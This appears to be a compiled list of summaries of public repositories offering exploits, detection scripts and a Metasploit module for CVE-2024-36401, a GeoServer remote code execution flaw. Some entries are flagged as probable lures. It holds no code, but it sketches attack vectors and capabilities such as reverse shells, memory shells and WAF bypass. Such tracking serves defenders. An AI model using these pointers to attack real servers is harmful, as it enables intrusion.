CVE-2024-36401

The repository lacks actual exploit code and only contains a README with vague descriptions and external links. It appears to be a social engineering lure rather than a legitimate PoC.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer versions with an XPath injection vulnerability leading to unauthenticated RCE. The exploit includes version detection, payload construction, and reverse shell capabilities.

This repository provides functional exploit code for CVE-2024-36401, demonstrating Remote Code Execution (RCE) in GeoServer via unsafely evaluated XPath expressions in property names. Multiple OGC request parameters (WFS, WMS, WPS) are shown with crafted payloads to execute arbitrary commands.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages OGNL injection via crafted XML payloads to achieve remote code execution (RCE), including reverse shell and memory shell injection capabilities.

This repository contains a functional exploit tool for CVE-2024-36401, targeting GeoServer with multiple attack vectors including DNS log probing, Jetty echo, and memory shell injection. The tool provides a GUI interface for executing these attacks and includes utilities for payload generation and attack execution.

This repository contains a functional Python-based exploit for CVE-2024-36401, targeting GeoServer versions prior to 2.25.1, 2.24.3, and 2.23.5. The exploit sends a crafted WFS request to execute a reverse shell payload, assuming the presence of 'nc' on the target system.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer instances via a crafted WFS request to achieve remote code execution (RCE). The exploit automates the discovery of feature types and sends payloads to trigger the vulnerability, logging successful exploitations via a server component.

This repository contains a functional exploit for CVE-2024-36401, a remote code execution vulnerability in GeoServer. The exploit leverages a crafted XML payload to execute arbitrary commands via the `exec` function in the `valueReference` attribute of a WFS GetPropertyValue request.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer versions prior to 2.23.6, 2.24.4, or 2.25.2. The exploit leverages a remote code execution (RCE) vulnerability via crafted WFS requests to execute arbitrary commands, including downloading and running a Meterpreter payload.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages XML injection to execute arbitrary commands, resulting in a reverse shell.

This repository contains a functional exploit for CVE-2024-36401, a remote command execution vulnerability in GeoServer. The exploit leverages a crafted WFS (Web Feature Service) request to execute arbitrary commands on the target system, supporting both direct command execution and reverse shell modes.

This repository contains a functional Python-based PoC for CVE-2024-36401, a remote code execution vulnerability in GeoServer. The exploit automates the extraction of Typenames and tests them for command execution via crafted requests to the GeoServer WFS interface.

The repository provides a functional exploit for CVE-2024-36401, demonstrating Remote Code Execution (RCE) in GeoServer via crafted WFS GetPropertyValue requests. The exploit leverages property name expression evaluation to execute arbitrary commands.

The repository claims to be an exploit for CVE-2024-36401 (GeoServer RCE) but lacks actual exploit code. Instead, it relies on external API calls to 'api.cvssadvisor.com' for SSRF-based detection, which is unrelated to the stated CVE. The README is vague and focuses on tool features rather than technical details of the vulnerability.

This repository contains a functional exploit for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer/GeoTools. The exploit leverages JXPath extension functions in OGC endpoints (e.g., WFS GetPropertyValue) to execute arbitrary Java code, demonstrated via Thread.sleep delays and file creation (touch).

This repository contains a functional exploit for CVE-2024-36401, an unauthenticated remote code execution vulnerability in GeoServer due to OGC XPath injection. The exploit crafts malicious XML payloads to execute arbitrary commands via the `exec()` function in JXPath, supporting reverse shell and command execution.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages a Java deserialization vulnerability to achieve remote code execution via crafted XML payloads.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's Property Expression Injection RCE vulnerability. It includes both detection (PoC) and exploitation capabilities, with support for custom memory shell injection and command execution.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit sends a crafted XML payload to execute arbitrary commands via Java runtime, establishing a reverse shell to the attacker's specified IP and port.

This repository contains a functional Python exploit for CVE-2024-36401, which targets a vulnerability in a WFS (Web Feature Service) server to achieve remote code execution via crafted GetPropertyValue requests. The exploit encodes a reverse shell payload in Base64 and sends it to the target server using specific parameters.

The repository contains a detection script for CVE-2024-36401, which is an RCE vulnerability in GeoServer. The script sends a crafted XML payload to the target GeoServer instance and checks for an out-of-band (OOB) request to determine vulnerability.

This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's unsafe handling of XPath expressions via the commons-jxpath library, enabling remote code execution. The exploit includes WAF bypass techniques using XML comments and supports command execution, delayed detection, and memory shell injection.

This repository contains a functional exploit tool for CVE-2024-36401, targeting GeoServer with multiple exploit modules including RCE, memory injection, XXE, reverse shell, and file reading. The code includes detailed implementations for each exploit type, with a GUI interface for ease of use.

This repository contains a functional Python-based exploit for CVE-2024-36401, which targets a vulnerability in a WFS (Web Feature Service) server to achieve remote code execution (RCE) via crafted HTTP requests. The exploit uses Base64-encoded commands and a reverse shell payload to gain control over the target system.

This Metasploit module exploits CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions < 2.23.6, >= 2.24.0 < 2.24.4, and >= 2.25.0 < 2.25.1. It abuses unsafely evaluated XPath expressions in OGC request parameters to execute arbitrary commands.